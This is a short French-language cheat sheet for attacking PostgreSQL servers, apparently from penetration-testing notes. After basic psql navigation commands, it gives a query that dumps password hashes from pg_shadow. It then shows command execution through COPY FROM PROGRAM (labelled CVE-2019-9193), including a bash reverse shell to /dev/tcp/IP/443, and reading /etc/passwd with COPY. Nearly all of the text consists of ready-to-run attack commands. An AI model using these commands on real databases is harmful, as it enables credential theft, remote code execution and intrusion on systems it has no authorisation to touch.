\l -- lister les bases \c nom -- se connecter\dt -- tables \du -- roles/utilisateursSELECT version(); SELECT usename,passwd FROM pg_shadow;
Exécution de commandes (CVE-2019-9193, COPY FROM PROGRAM)
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT * FROM cmd_exec;-- reverse shell : COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/IP/443 0>&1"';
Lecture de fichiers
CREATE TABLE f(t text); COPY f FROM '/etc/passwd'; SELECT * FROM f;